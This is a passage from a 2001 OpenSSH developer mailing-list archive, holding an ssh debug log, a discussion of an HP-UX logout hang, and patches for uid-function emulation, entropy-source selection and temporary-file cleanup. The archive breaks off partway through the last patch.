newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: waiting for SSH2_MSG_NEWKEYS debug1: newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: done: ssh_kex2. debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,password,keyboard-interactive debug3: start over, passed a different list publickey,password,keyboard-interactive debug3: preferred publickey,password,keyboard-interactive debug3: authmethod_lookup publickey debug3: remaining preferred: password,keyboard-interactive debug3: authmethod_is_enabled publickey debug1: next auth method to try is publickey debug1: userauth_pubkey_agent: testing agent key /home/abush/.ssh/id_dsa debug3: send_pubkey_test debug2: we sent a publickey packet, wait for reply debug1: input_userauth_pk_ok: pkalg ssh-dss blen 433 lastkey 0x808f678 hint -1 debug2: input_userauth_pk_ok: fp 2f:3d:aa:c6:e8:6e:68:f5:d4:7e:8a:7f:3c:af:3e:4d debug3: sign_and_send_pubkey debug3: clear_auth_state: key_free 0x808f678 debug1: ssh-userauth2 successful: method publickey debug3: clear hostkey 0 debug3: clear hostkey 1 debug3: clear hostkey 2 debug1: fd 5 setting O_NONBLOCK debug1: fd 6 IS O_NONBLOCK debug1: channel 0: new [client-session] debug1: channel_new: 0 debug1: send channel open 0 debug1: Entering interactive session. debug2: callback start debug1: client_init id 0 arg 0 debug2: tty_make_modes: ospeed 38400 debug2: tty_make_modes: ispeed 38400 debug2: tty_make_modes: 1 3 debug2: tty_make_modes: 2 28 debug2: tty_make_modes: 3 127 debug2: tty_make_modes: 4 21 debug2: tty_make_modes: 5 4 debug2: tty_make_modes: 6 255 debug2: tty_make_modes: 7 255 debug2: tty_make_modes: 8 17 debug2: tty_make_modes: 9 19 debug2: tty_make_modes: 10 26 debug2: tty_make_modes: 12 18 debug2: tty_make_modes: 13 23 debug2: tty_make_modes: 14 22 debug2: tty_make_modes: 18 15 debug2: tty_make_modes: 30 0 debug2: tty_make_modes: 31 0 debug2: tty_make_modes: 32 0 debug2: tty_make_modes: 33 0 debug2: tty_make_modes: 34 0 debug2: tty_make_modes: 35 0 debug2: tty_make_modes: 36 1 debug2: tty_make_modes: 37 0 debug2: tty_make_modes: 38 1 debug2: tty_make_modes: 39 1 debug2: tty_make_modes: 40 0 debug2: tty_make_modes: 41 1 debug2: tty_make_modes: 50 1 debug2: tty_make_modes: 51 1 debug2: tty_make_modes: 52 0 debug2: tty_make_modes: 53 1 debug2: tty_make_modes: 54 1 debug2: tty_make_modes: 55 1 debug2: tty_make_modes: 56 0 debug2: tty_make_modes: 57 0 debug2: tty_make_modes: 58 0 debug2: tty_make_modes: 59 1 debug2: tty_make_modes: 60 1 debug2: tty_make_modes: 61 1 debug2: tty_make_modes: 62 0 debug2: tty_make_modes: 70 1 debug2: tty_make_modes: 71 0 debug2: tty_make_modes: 72 1 debug2: tty_make_modes: 73 0 debug2: tty_make_modes: 74 0 debug2: tty_make_modes: 75 0 debug2: tty_make_modes: 90 1 debug2: tty_make_modes: 91 1 debug2: tty_make_modes: 92 0 debug2: tty_make_modes: 93 0 debug1: channel request 0: shell debug2: callback done debug1: channel 0: open confirm rwindow 0 rmax 16384 debug2: channel 0: rcvd adjust 32768 Last login: Thu Jun 7 10:22:33 2001 from sysadm.microcen TERM = (xterm) HHHHHHHHH H H H H H H H H H[?1l>k200$ exit logout debug1: channel 0: rcvd eof debug1: channel 0: output open -> drain debug1: channel 0: obuf empty debug1: channel 0: output drain -> closed debug1: channel 0: close_write debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: channel 0: rcvd close debug1: channel 0: input open -> closed debug1: channel 0: close_read debug2: channel 0: no data after CLOSE debug1: channel 0: send close debug1: channel 0: is dead debug1: channel_free: channel 0: status: The following connections are open: #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1) debug1: channel_free: channel 0: dettaching channel user Connection to k200 closed. debug1: Transferred: stdin 0, stdout 0, stderr 28 bytes in 7.1 seconds debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 4.0 debug1: Exit status 0 From Lutz.Jaenicke at aet.TU-Cottbus.DE Fri Jun 8 01:36:16 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 7 Jun 2001 17:36:16 +0200 Subject: HPUX: ssh hangs after shell exit In-Reply-To: <3B1F885C.92328A94@mail.microcenter.com>; from abush@microcenter.com on Thu, Jun 07, 2001 at 09:57:48AM -0400 References: <3B1D4F85.FEF10A43@mail.microcenter.com> <20010607061206.I14017@postal.il.thewrittenword.com> <3B1F885C.92328A94@mail.microcenter.com> Message-ID: <20010607173616.A13083@ws01.aet.tu-cottbus.de> On Thu, Jun 07, 2001 at 09:57:48AM -0400, Aaron Bush wrote: > openssh-unix-dev at thewrittenword.com wrote: > > > > On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > > > The problem i am having appears to be similar to what others have > > > reported where after typing exit in an interactive shell the connection > > > is not closed unitl an additional _one_ key stroke is issued (space-bar, > > > enter, etc...). > > > > > > The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting > > > using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and > > > FreeBSD-4.2. The behavior so far is _always_ consistent: > > > > We have *no* problems with 2.9p1 on HP-UX 11.00 here. We do use the HP > > commercial C compiler to build it. > > > > -- > > albert chin (china at thewrittenword.com) > > I am using gcc 2.95.2 and the problem does exist. > I have not tried the HP ANSI C compiler though. I am using HP's compiler on 10.20 and the problem is there but not reproducable. Sometimes it happens, sometimes it does not. With respect to HP's documentation, on 10.20 the manual page for sigaction states: SA_RESTART This flag affects the behaviour of interruptible functions; that is, those specified to fail with errno set to EINTR. If set, and a function specified as interruptible is interrupted by this signal, the function will restart and will not fail with EINTR unless otherwise specified. If the flag is not set, interruptible functions interrupted by this signal will fail with errno set to EINTR. The select() manual page states: [EINTR] The select() function was interrupted before any of the selected events occurred and before the timeout interval expired. If SA_RESTART has been set for the interrupting signal, it is implementation-dependent whether select() restarts or returns with EINTR. Therefore we cannot rely on select() being interrupted when SA_RESTART is set. It is implementation dependent, whatever this means on a specific version of HP-UX. But the authors of the documentation specificly wanted to point out that we should not rely on a specific behaviour. Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From J.S.Peatfield at damtp.cam.ac.uk Fri Jun 8 01:58:26 2001 From: J.S.Peatfield at damtp.cam.ac.uk (Jon Peatfield) Date: Thu, 07 Jun 2001 16:58:26 +0100 Subject: Patch for systems with no setreuid() Message-ID: <200106071558.QAA01642.redmires.amtp.cam.ac.uk@damtp.cam.ac.uk> Sorry if I'm duplicating an existing patch, but... On systems with no seteuid() that have setreuid() there is an emulation, but if both are lacking (but we do have setresuid()), nothing is done. The following seems to be right, but I've only got one machine (running an ancient version of HP-UX) which needs this so it may not be general: --cut-here-- --- config.h.in.orig Thu Jun 7 14:18:57 2001 +++ config.h.in Thu Jun 7 14:19:33 2001 @@ -503,6 +503,9 @@ /* Define if you have the setreuid function. */ #undef HAVE_SETREUID +/* Define if you have the setresuid function. */ +#undef HAVE_SETRESUID + /* Define if you have the setrlimit function. */ #undef HAVE_SETRLIMIT --- configure.orig Thu Jun 7 14:12:53 2001 +++ configure Thu Jun 7 14:13:40 2001 @@ -3184,7 +3184,7 @@ fi -for ac_func in arc4random atexit b64_ntop bcopy bindresvport_sa clock fchown fchmod freeaddrinfo futimes gai_strerror getcwd getaddrinfo getgrouplist getnameinfo getrlimit getrusage getttyent getusershell glob inet_aton inet_ntoa inet_ntop innetgr login_getcapbool md5_crypt memmove mkdtemp on_exit openpty realpath rresvport_af setdtablesize setenv setegid seteuid setlogin setproctitle setresgid setreuid setrlimit setsid sigaction sigvec snprintf strerror strlcat strlcpy strmode strsep strtok_r sysconf tcgetpgrp utimes vsnprintf vhangup vis waitpid _getpty __b64_ntop +for ac_func in arc4random atexit b64_ntop bcopy bindresvport_sa clock fchown fchmod freeaddrinfo futimes gai_strerror getcwd getaddrinfo getgrouplist getnameinfo getrlimit getrusage getttyent getusershell glob inet_aton inet_ntoa inet_ntop innetgr login_getcapbool md5_crypt memmove mkdtemp on_exit openpty realpath rresvport_af setdtablesize setenv setegid seteuid setlogin setproctitle setresgid setreuid setresuid setrlimit setsid sigaction sigvec snprintf strerror strlcat strlcpy strmode strsep strtok_r sysconf tcgetpgrp utimes vsnprintf vhangup vis waitpid _getpty __b64_ntop do echo $ac_n "checking for $ac_func""... $ac_c" 1>&6 echo "configure:3191: checking for $ac_func" >&5 --- configure.in.orig Thu Jun 7 14:12:44 2001 +++ configure.in Thu Jun 7 14:13:10 2001 @@ -447,7 +447,7 @@ ) dnl Checks for library functions. -AC_CHECK_FUNCS(arc4random atexit b64_ntop bcopy bindresvport_sa clock fchown fchmod freeaddrinfo futimes gai_strerror getcwd getaddrinfo getgrouplist getnameinfo getrlimit getrusage getttyent getusershell glob inet_aton inet_ntoa inet_ntop innetgr login_getcapbool md5_crypt memmove mkdtemp on_exit openpty realpath rresvport_af setdtablesize setenv setegid seteuid setlogin setproctitle setresgid setreuid setrlimit setsid sigaction sigvec snprintf strerror strlcat strlcpy strmode strsep strtok_r sysconf tcgetpgrp utimes vsnprintf vhangup vis waitpid _getpty __b64_ntop) +AC_CHECK_FUNCS(arc4random atexit b64_ntop bcopy bindresvport_sa clock fchown fchmod freeaddrinfo futimes gai_strerror getcwd getaddrinfo getgrouplist getnameinfo getrlimit getrusage getttyent getusershell glob inet_aton inet_ntoa inet_ntop innetgr login_getcapbool md5_crypt memmove mkdtemp on_exit openpty realpath rresvport_af setdtablesize setenv setegid seteuid setlogin setproctitle setresgid setreuid setresuid setrlimit setsid sigaction sigvec snprintf strerror strlcat strlcpy strmode strsep strtok_r sysconf tcgetpgrp utimes vsnprintf vhangup vis waitpid _getpty __b64_ntop) dnl Checks for time functions AC_CHECK_FUNCS(gettimeofday time) dnl Checks for libutil functions --- openbsd-compat/bsd-misc.c.orig Thu Jun 7 14:07:58 2001 +++ openbsd-compat/bsd-misc.c Thu Jun 7 14:26:12 2001 @@ -70,6 +70,20 @@ } #endif /* !defined(HAVE_SETEUID) && defined(HAVE_SETREUID) */ +#if !defined(HAVE_SETEUID) && defined(HAVE_SETRESUID) +int seteuid(uid_t euid) +{ + return(setresuid(-1,euid,-1)); +} +#endif /* !defined(HAVE_SETEUID) && defined(HAVE_SETRESUID) */ + +#if !defined(HAVE_SETREUID) && defined(HAVE_SETRESUID) +int setreuid(uid_t ruid, uid_t euid) +{ + return(setresuid(ruid,euid,-1)); +} +#endif /* !defined(HAVE_SETREUID) && defined(HAVE_SETRESUID) */ + #if !defined(HAVE_SETEGID) && defined(HAVE_SETRESGID) int setegid(uid_t egid) { --cut-here-- Of course on this particular platform I need other patches (to turn off HP-UX specific stuff which are missing (hpsecurity etc)), but the above might be useful elsewhere... -- Jon Peatfield, DAMTP, Computer Officer, University of Cambridge Telephone: +44 1223 3 37852 Mail: J.S.Peatfield at damtp.cam.ac.uk From dwd at bell-labs.com Fri Jun 8 03:29:57 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Thu, 7 Jun 2001 12:29:57 -0500 Subject: non-ansi function in openbsd-compat Message-ID: <20010607122957.A15107@lucent.com> I ran across one file in the openbsd-compat directory, strmode.c, that was not using an ANSI C function declaration. One compiler (HPUX's cc -Ae) wouldn't let it pass. Here's a patch. - Dave Dykstra *** openbsd-compat/strmode.c.O Wed Jun 6 17:32:44 2001 --- openbsd-compat/strmode.c Wed Jun 6 17:32:59 2001 *************** *** 43,51 **** #include void ! strmode(mode, p) ! register mode_t mode; ! register char *p; { /* print type */ switch (mode & S_IFMT) { --- 43,49 ---- #include void ! strmode(register mode_t mode, register char *p) { /* print type */ switch (mode & S_IFMT) { From dwd at bell-labs.com Fri Jun 8 03:50:14 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Thu, 7 Jun 2001 12:50:14 -0500 Subject: Patch to enable multiple possible sources of entropy Message-ID: <20010607125014.A15157@lucent.com> I have a need to have the same OpenSSH binaries run on multiple machines which are administered by different people. That means on Solaris, for example, there will be some with /dev/random, some on which I can run prngd because they'll be installing my binaries as root, and some which will have neither because they will be only installed as non-root. Below is a patch to enable choosing all 3 possible sources at compile time, with the available source selected at run time. If no configure parameters are given, it will still determine the entropy source at compile time and only the code for the one type, exactly as it does today. The patch adds a configure option called --with-builtin-entropy. I have tested this in all possible combinations of entropy sources, and on 6 different flavors of Unix (linux, solaris, sunos4, hpux, irix, and unixware1). The patch is against 2.9p1 but applies cleanly to the current CVS. Please accept this patch into the openssh code base. Don't forget to run autoheader and autoconf. - Dave Dykstra *** entropy.c.O Fri Jun 1 15:52:20 2001 --- entropy.c Tue Jun 5 17:41:47 2001 *************** *** 80,91 **** # define USE_PRNGD #endif - #if defined(USE_PRNGD) || defined(RANDOM_POOL) - #ifdef USE_PRNGD /* Collect entropy from PRNGD/EGD */ int ! get_random_bytes(unsigned char *buf, int len) { int fd; char msg[2]; --- 80,89 ---- # define USE_PRNGD #endif #ifdef USE_PRNGD /* Collect entropy from PRNGD/EGD */ int ! prngd_get_random_bytes(unsigned char *buf, int len) { int fd; char msg[2]; *************** *** 100,110 **** --- 98,110 ---- memset(&addr, '\0', sizeof(addr)); #ifdef PRNGD_PORT + debug2("Opening entropy socket on localhost port %d", PRNGD_PORT); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); addr.sin_port = htons(PRNGD_PORT); addr_len = sizeof(struct sockaddr_in); #else /* use IP socket PRNGD_SOCKET instead */ + debug2("Opening entropy socket at %s", PRNGD_SOCKET); /* Sanity checks */ if (sizeof(PRNGD_SOCKET) > sizeof(addr.sun_path)) fatal("Random pool path is too long"); *************** *** 179,192 **** close(fd); return(rval); } ! #else /* !USE_PRNGD */ #ifdef RANDOM_POOL /* Collect entropy from /dev/urandom or pipe */ int ! get_random_bytes(unsigned char *buf, int len) { int random_pool; random_pool = open(RANDOM_POOL, O_RDONLY); if (random_pool == -1) { error("Couldn't open random pool \"%s\": %s", --- 179,194 ---- close(fd); return(rval); } ! #endif /* !USE_PRNGD */ ! #ifdef RANDOM_POOL /* Collect entropy from /dev/urandom or pipe */ int ! pool_get_random_bytes(unsigned char *buf, int len) { int random_pool; + debug2("Opening random pool at %s", RANDOM_POOL); random_pool = open(RANDOM_POOL, O_RDONLY); if (random_pool == -1) { error("Couldn't open random pool \"%s\": %s", *************** *** 206,242 **** return(1); } #endif /* RANDOM_POOL */ - #endif /* USE_PRNGD */ - - /* - * Seed OpenSSL's random number pool from Kernel random number generator - * or PRNGD/EGD - */ - void - seed_rng(void) - { - unsigned char buf[32]; - - debug("Seeding random number generator"); - - if (!get_random_bytes(buf, sizeof(buf))) { - if (!RAND_status()) - fatal("Entropy collection failed and entropy exhausted"); - } else { - RAND_add(buf, sizeof(buf), sizeof(buf)); - } - - memset(buf, '\0', sizeof(buf)); - } - - void - init_rng(void) - { - check_openssl_version(); - } - - #else /* defined(USE_PRNGD) || defined(RANDOM_POOL) */ /* * FIXME: proper entropy estimations. All current values are guesses * FIXME: (ATL) do estimates at compile time? --- 208,215 ---- return(1); } #endif /* RANDOM_POOL */ + #ifdef USE_BUILTIN_ENTROPY /* * FIXME: proper entropy estimations. All current values are guesses * FIXME: (ATL) do estimates at compile time? *************** *** 834,840 **** * syscalls and program output */ void ! seed_rng(void) { mysig_t old_sigchld_handler; --- 807,813 ---- * syscalls and program output */ void ! prng_seed_rng(void) { mysig_t old_sigchld_handler; *************** *** 860,871 **** } void ! init_rng(void) { int original_euid; - check_openssl_version(); - original_uid = getuid(); original_euid = geteuid(); --- 833,842 ---- } void ! prng_init_rng(void) { int original_euid; original_uid = getuid(); original_euid = geteuid(); *************** *** 912,915 **** prng_initialised = 1; } ! #endif /* defined(USE_PRNGD) || defined(RANDOM_POOL) */ --- 883,979 ---- prng_initialised = 1; } ! #endif /* USE_BUILTIN_ENTROPY */ ! ! #define BUILTIN_SOURCE 1 ! #define PRNGD_SOURCE 2 ! #define POOL_SOURCE 3 ! ! static int seed_source = 0; ! ! void ! init_rng(void) ! { ! check_openssl_version(); ! ! #ifdef RANDOM_POOL ! #if !defined(USE_PRNGD) && !defined(USE_BUILTIN_ENTROPY) ! seed_source = POOL_SOURCE; ! #else ! if (access(RANDOM_POOL, R_OK) == 0) { ! seed_source = POOL_SOURCE; ! return; ! } ! #endif ! #endif /* RANDOM_POOL */ ! ! /* it's not trivial to probe for an open port so just make it ! * take priority over the other sources if it is defined ! */ ! #ifdef PRNGD_PORT ! seed_source = PRNGD_SOURCE; ! #else ! ! #ifdef PRNGD_SOCKET ! #ifndef USE_BUILTIN_ENTROPY ! seed_source = PRNGD_SOURCE; ! #else ! if (access(PRNGD_SOCKET, R_OK) == 0) { ! seed_source = PRNGD_SOURCE; ! return; ! } ! #endif /* USE_BUILTIN_ENTROPY */ ! #endif /* PRNGD_SOCKET */ ! ! #ifdef USE_BUILTIN_ENTROPY ! seed_source = BUILTIN_SOURCE; ! prng_init_rng(); ! #endif ! ! #endif /* PRNGD_PORT */ ! ! if (seed_source == 0) ! fatal("Couldn't find source for random number generator seed"); ! } ! ! /* ! * Seed OpenSSL's random number pool ! */ ! void ! seed_rng(void) ! { ! unsigned char buf[32]; ! int ret; ! ! debug("Seeding random number generator"); ! ! switch (seed_source) { ! #ifdef USE_BUILTIN_ENTROPY ! case BUILTIN_SOURCE: ! prng_seed_rng(); ! return; ! #endif ! #ifdef USE_PRNGD ! case PRNGD_SOURCE: ! ret = prngd_get_random_bytes(buf, sizeof(buf)); ! break; ! #endif ! #ifdef RANDOM_POOL ! case POOL_SOURCE: ! ret = pool_get_random_bytes(buf, sizeof(buf)); ! break; ! #endif ! } ! ! #if defined(USE_PRNGD) || defined(RANDOM_POOL) ! if (!ret) { ! if (!RAND_status()) ! fatal("Entropy collection failed and entropy exhausted"); ! } else { ! RAND_add(buf, sizeof(buf), sizeof(buf)); ! } ! ! memset(buf, '\0', sizeof(buf)); ! #endif ! } ! *** configure.in.O Mon Jun 4 12:25:12 2001 --- configure.in Thu Jun 7 13:37:09 2001 *************** *** 1334,1340 **** ] ) ! # Check for PRNGD/EGD pool file AC_ARG_WITH(prngd-port, [ --with-prngd-port=PORT read entropy from PRNGD/EGD localhost:PORT], [ --- 1334,1340 ---- ] ) ! # Check for PRNGD/EGD pool port request AC_ARG_WITH(prngd-port, [ --with-prngd-port=PORT read entropy from PRNGD/EGD localhost:PORT], [ *************** *** 1349,1354 **** --- 1349,1357 ---- AC_ARG_WITH(prngd-socket, [ --with-prngd-socket=FILE read entropy from PRNGD/EGD socket FILE (default=/var/run/egd-pool)], [ + if test ! -z "$PRNGD_PORT" ; then + AC_MSG_ERROR([*** cannot use both --with-prngd-port and --with-prngd-socket]) + fi if test "x$withval" != "xno" ; then PRNGD_SOCKET="$withval" AC_DEFINE_UNQUOTED(PRNGD_SOCKET, "$PRNGD_SOCKET") *************** *** 1375,1385 **** ] ) # detect pathnames for entropy gathering commands, if we need them INSTALL_SSH_PRNG_CMDS="" rm -f prng_commands ! if (test -z "$RANDOM_POOL" && test -z "$PRNGD") ; then # Use these commands to collect entropy OSSH_PATH_ENTROPY_PROG(PROG_LS, ls) OSSH_PATH_ENTROPY_PROG(PROG_NETSTAT, netstat) --- 1378,1406 ---- ] ) + # Check for use of builtin entropy collector + AC_ARG_WITH(builtin-entropy, + [ --with-builtin-entropy use builtin entropy collector if nothing else available], + [ + if test ! -z "$PRNGD_PORT" ; then + AC_MSG_ERROR([*** cannot use both --with-prngd-port and --with-builtin-entropy]) + fi + BUILTIN_RNG=1 + ], + [ + # Only select by default if don't have another method + if test -z "$RANDOM_POOL" && test -z "$PRNGD" ; then + BUILTIN_RNG=1 + fi + ] + ) # detect pathnames for entropy gathering commands, if we need them INSTALL_SSH_PRNG_CMDS="" rm -f prng_commands ! if test ! -z "$BUILTIN_RNG" ; then ! AC_DEFINE(USE_BUILTIN_ENTROPY) ! # Use these commands to collect entropy OSSH_PATH_ENTROPY_PROG(PROG_LS, ls) OSSH_PATH_ENTROPY_PROG(PROG_NETSTAT, netstat) *************** *** 1885,1901 **** # Print summary of options ! if test ! -z "$RANDOM_POOL" ; then ! RAND_MSG="Device ($RANDOM_POOL)" ! else ! if test ! -z "$PRNGD_PORT" ; then ! RAND_MSG="PRNGD/EGD (port localhost:$PRNGD_PORT)" ! elif test ! -z "$PRNGD_SOCKET" ; then ! RAND_MSG="PRNGD/EGD (socket $PRNGD_SOCKET)" else ! RAND_MSG="Builtin (timeout $entropy_timeout)" ! BUILTIN_RNG=1 fi fi # Someone please show me a better way :) --- 1906,1930 ---- # Print summary of options ! RAND_MSG="" ! randmsg() ! { ! if test -z "$RAND_MSG" ; then ! RAND_MSG="$1" else ! RAND_MSG="$RAND_MSG or $1" fi + } + if test ! -z "$RANDOM_POOL" ; then + randmsg "Device ($RANDOM_POOL)" + fi + if test ! -z "$PRNGD_PORT" ; then + randmsg "PRNGD/EGD (port localhost:$PRNGD_PORT)" + elif test ! -z "$PRNGD_SOCKET" ; then + randmsg "PRNGD/EGD (socket $PRNGD_SOCKET)" + fi + if test ! -z "$BUILTIN_RNG" ; then + randmsg "Builtin (timeout $entropy_timeout)" fi # Someone please show me a better way :) *** acconfig.h.O Mon Jun 4 12:42:09 2001 --- acconfig.h Mon Jun 4 13:53:36 2001 *************** *** 95,100 **** --- 95,103 ---- /* Port number of PRNGD/EGD random number socket */ #undef PRNGD_PORT + /* Use builtin entropy collector if nothing else available */ + #undef USE_BUILTIN_ENTROPY + /* Builtin PRNG command timeout */ #undef ENTROPY_TIMEOUT_MSEC From stevesk at pobox.com Fri Jun 8 04:42:27 2001 From: stevesk at pobox.com (Kevin Steves) Date: Thu, 7 Jun 2001 11:42:27 -0700 (PDT) Subject: Defect: OpenSSH hangs on logout In-Reply-To: <20010607092831.D24958@eeg.ccf.org> Message-ID: On Thu, 7 Jun 2001, Greg Wooledge wrote: :> does 10.20 hang with 2.9 without the patch? with the patch? : :It hangs both with and without the patch. Every time. (It certainly :doesn't act like a race condition, as someone else mentioned.) : :Just to refresh memories, this is the symptom: : : box1$ ssh somewhere : somewhere$ sleep 500 & : somewhere$ logout : (hangs) : :Then, if I kill the sleep process in another window, the connection is :immediately terminated and everything is back to normal. this is a different problem. it is easy to produce for me on hp-ux 11.11 with protocol 2. i ssh to the hp-ux host, followed by an exit, i see: bash-2.05$ exit logout logout logout and hang. on the server: stevesk 1611 1609 9 11:33:29 ? 0:00 root 1609 912 0 11:33:28 ? 0:00 sshd: stevesk at 1 the server was blocked in select() when the SIGCHLD was received, and it was restarted, where it is blocked waiting for input. if you enter one character it will return and process the sigchld hander flag. the patch i posted, does not set SA_RESTART for SIGCHLD. some systems may restart select() in this case, and we don't want that behaviour. From markus.friedl at informatik.uni-erlangen.de Fri Jun 8 06:52:33 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 22:52:33 +0200 Subject: OpenSSH tmp cleanup In-Reply-To: <20010605165404.A13522@faui02.informatik.uni-erlangen.de>; from Markus.Friedl@informatik.uni-erlangen.de on Tue, Jun 05, 2001 at 04:54:04PM +0200 References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> Message-ID: <20010607225233.A21260@folly> did someone check this? -m On Tue, Jun 05, 2001 at 04:54:04PM +0200, Markus Friedl wrote: > On Tue, Jun 05, 2001 at 09:21:46AM +0300, Jarno Huuskonen wrote: > > I noticed that Markus has fixed the temporary file cleanup problems in > > OpenSSH cvs. What files need patching for this ? I only noticed > > changes in: session.c, channels.h and channels.c. > > yes. > > i tried to port this back to 2.9, but i don't have time for > testing etc. > > simple fix is > s/cookies/x11_forwarding_with_openssh_is_fun/ > in session.c > > correct fix looks like: > > Index: channels.c > =================================================================== > RCS file: /home/markus/cvs/ssh/channels.c,v > retrieving revision 1.109 > diff -u -r1.109 channels.c > --- channels.c 2001/04/17 12:55:03 1.109 > +++ channels.c 2001/06/05 14:38:42 > @@ -2524,10 +2524,17 @@ > /* removes the agent forwarding socket */ > > void > -cleanup_socket(void) > +auth_sock_cleanup_proc(void *_pw) > { > - unlink(channel_forwarded_auth_socket_name); > - rmdir(channel_forwarded_auth_socket_dir); > + struct passwd *pw = _pw; > + > + if (channel_forwarded_auth_socket_name) { > + temporarily_use_uid(pw); > + unlink(channel_forwarded_auth_socket_name); > + rmdir(channel_forwarded_auth_socket_dir); > + channel_forwarded_auth_socket_name = NULL; > + restore_uid(); > + } > } > > /* > @@ -2566,11 +2573,9 @@ > snprintf(channel_forwarded_auth_socket_name, MAX_SOCKET_NAME, "%s/agent.%d", > channel_forwarded_auth_socket_dir, (int) getpid()); > > - if (atexit(cleanup_socket) < 0) { > - int saved = errno; > - cleanup_socket(); > - packet_disconnect("socket: %.100s", strerror(saved)); > - } > + /* delete agent socket on fatal() */ > + fatal_add_cleanup(auth_sock_cleanup_proc, pw); > + > /* Create the socket. */ > sock = socket(AF_UNIX, SOCK_STREAM, 0); > if (sock < 0) > Index: channels.h > =================================================================== > RCS file: /home/markus/cvs/ssh/channels.h,v > retrieving revision 1.31 > diff -u -r1.31 channels.h > --- channels.h 2001/04/13 22:46:53 1.31 > +++ channels.h 2001/06/05 14:37:23 > @@ -293,6 +293,8 @@ > */ > char *auth_get_socket_name(void); > > +void auth_sock_cleanup_proc(void *_pw); > + > /* > * This is called to process SSH_CMSG_AGENT_REQUEST_FORWARDING on the server. > * This starts forwarding authentication requests. > Index: session.c > =================================================================== > RCS file: /home/markus/cvs/ssh/session.c,v > retrieving revision 1.74 > diff -u -r1.74 session.c > --- session.c 2001/04/17 19:34:25 1.74 > +++ session.c 2001/06/05 14:39:54 > @@ -89,12 +89,15 @@ > void session_set_fds(Session *s, int fdin, int fdout, int fderr); > void session_pty_cleanup(Session *s); > void session_proctitle(Session *s); > +int session_setup_x11fwd(Session *s); > +void session_close(Session *s); > void do_exec_pty(Session *s, const char *command); > void do_exec_no_pty(Session *s, const char *command); > void do_login(Session *s, const char *command); > void do_child(Session *s, const char *command); > void do_motd(void); > int check_quietlogin(Session *s, const char *command); > +void xauthfile_cleanup_proc(void *pw); > > void do_authenticated1(Authctxt *authctxt); > void do_authenticated2(Authctxt *authctxt); > @@ -154,18 +157,26 @@ > do_authenticated2(authctxt); > else > do_authenticated1(authctxt); > + > + /* remote user's local Xauthority file and agent socket */ > + if (xauthfile) > + xauthfile_cleanup_proc(authctxt->pw); > + if (auth_get_socket_name()) > + auth_sock_cleanup_proc(authctxt->pw); > } > > /* > * Remove local Xauthority file. > */ > void > -xauthfile_cleanup_proc(void *ignore) > +xauthfile_cleanup_proc(void *_pw) > { > - debug("xauthfile_cleanup_proc called"); > + struct passwd *pw = _pw; > + char *p; > > + debug("xauthfile_cleanup_proc called"); > if (xauthfile != NULL) { > - char *p; > + temporarily_use_uid(pw); > unlink(xauthfile); > p = strrchr(xauthfile, '/'); > if (p != NULL) { > @@ -174,6 +185,7 @@ > } > xfree(xauthfile); > xauthfile = NULL; > + restore_uid(); > } > } > > @@ -209,7 +221,7 @@ > { > Session *s; > char *command; > - int success, type, fd, n_bytes, plen, screen_flag, have_pty = 0; > + int success, type, n_bytes, plen, screen_flag, have_pty = 0; > int compression_level = 0, enable_compression_after_reply = 0; > u_int proto_len, data_len, dlen; > > @@ -290,22 +302,6 @@ > break; > > case SSH_CMSG_X11_REQUEST_FORWARDING: > - if (!options.x11_forwarding) { > - packet_send_debug("X11 forwarding disabled in server configuration file."); > - break; > - } > - if (!options.xauth_location) { > - packet_send_debug("No xauth program; cannot forward with spoofing."); > - break; > - } > - if (no_x11_forwarding_flag) { > - packet_send_debug("X11 forwarding not permitted for this authentication."); > - break; > - } > - debug("Received request for X11 forwarding with auth spoofing."); > - if (s->display != NULL) > - packet_disconnect("Protocol error: X11 display already set."); > - > s->auth_proto = packet_get_string(&proto_len); > s->auth_data = packet_get_string(&data_len); > > @@ -325,31 +321,11 @@ > 4 + proto_len + 4 + data_len, type); > s->screen = 0; > } > - s->display = x11_create_display_inet(s->screen, options.x11_display_offset); > - > - if (s->display == NULL) > - break; > - > - /* Setup to always have a local .Xauthority. */ > - xauthfile = xmalloc(MAXPATHLEN); > - strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); > - temporarily_use_uid(s->pw); > - if (mkdtemp(xauthfile) == NULL) { > - restore_uid(); > - error("private X11 dir: mkdtemp %s failed: %s", > - xauthfile, strerror(errno)); > - xfree(xauthfile); > - xauthfile = NULL; > - /* XXXX remove listening channels */ > - break; > + success = session_setup_x11fwd(s); > + if (!success) { > + xfree(s->auth_proto); > + xfree(s->auth_data); > } > - strlcat(xauthfile, "/cookies", MAXPATHLEN); > - fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); > - if (fd >= 0) > - close(fd); > - restore_uid(); > - fatal_add_cleanup(xauthfile_cleanup_proc, NULL); > - success = 1; > break; > > case SSH_CMSG_AGENT_REQUEST_FORWARDING: > @@ -402,9 +378,7 @@ > > if (command != NULL) > xfree(command); > - /* Cleanup user's local Xauthority file. */ > - if (xauthfile) > - xauthfile_cleanup_proc(NULL); > + session_close(s); > return; > > default: > @@ -1372,23 +1346,7 @@ > int > session_x11_req(Session *s) > { > - int fd; > - if (no_x11_forwarding_flag) { > - debug("X11 forwarding disabled in 